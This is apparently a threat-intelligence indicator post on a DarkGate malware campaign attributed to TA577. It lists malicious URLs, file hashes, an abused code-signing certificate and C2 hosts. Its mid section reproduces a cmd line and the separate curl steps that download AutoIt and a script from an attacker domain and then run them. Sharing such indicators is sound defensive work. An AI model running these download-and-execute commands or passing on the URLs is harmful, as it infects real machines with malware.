13.10.2023 | Darkgate | TA577

*************************************************

.url https://arquivaae.com.br/ine/?
.url https://isoowac.com/gfie/?
.url https://affaires.co.in/nm/?
.zip bf2a69d4728af507440925f462a41bac0529dd70eec76ff8b5988bf510bea8ef
.vbs 1e8a6d34c0fe5a5ad2fc1d6ff7000bcf8efa0704c397cb6ef021c2692bf17fe6

Round 2

.zip 902cba22f379a08607515944d8a3ab4718cdc55cc461f1fdb07890b293cd78a0
.exe b79b536569c0060a834e4001289a6700692d67df58e644779fababf0df22fc75

*************************************************

Code Signing Certificate

Organisation:	AAA CLOTHING LIMITED
Issuer:	SSL.com EV Code Signing Intermediate CA RSA R3
Algorithm:	sha256WithRSAEncryption
Valid from:	2023-10-05T14:00:57Z
Valid to:	2024-10-04T14:00:57Z
Serial number:	 255ed3ced2f5a11ade08df72bb055b9d
Thumbprint Algorithm:	SHA256
Thumbprint:	 9d77c670b5f87c059725e541d3c1117f10c1d4867b5a59746146ddc5800d63b7
Source:	This information was brought to you by ReversingLabs A1000 Malware Analysis Platform

*************************************************

url > zip > vbs

WScript.exe C:\Users\Admin\AppData\Local\Temp\Doc-94.vbs

cmd.exe f InStr(1,  WScript.ScriptFullName,"vbs", 1) > 0 Then:path = WScript.ScriptFullName:end if
'/c cd /d %temp% & curl -o Autoit3.exe http://whoernet.co.com:80 & curl -o dftxsm.au3 http://whoernet.co.com:80/msifvwjscyk & Autoit3.exe dftxsm.au3

curl -o Autoit3.exe http://whoernet.co.com:80 

curl -o dftxsm.au3 http://whoernet.co.com:80/msifvwjscyk 

Autoit3.exe dftxsm.au3

*************************************************

c2

http://whoernet.co.com/
http://whoernet.co.com/msifvwjscyk
http://whoernet.co.com/sbhbrq
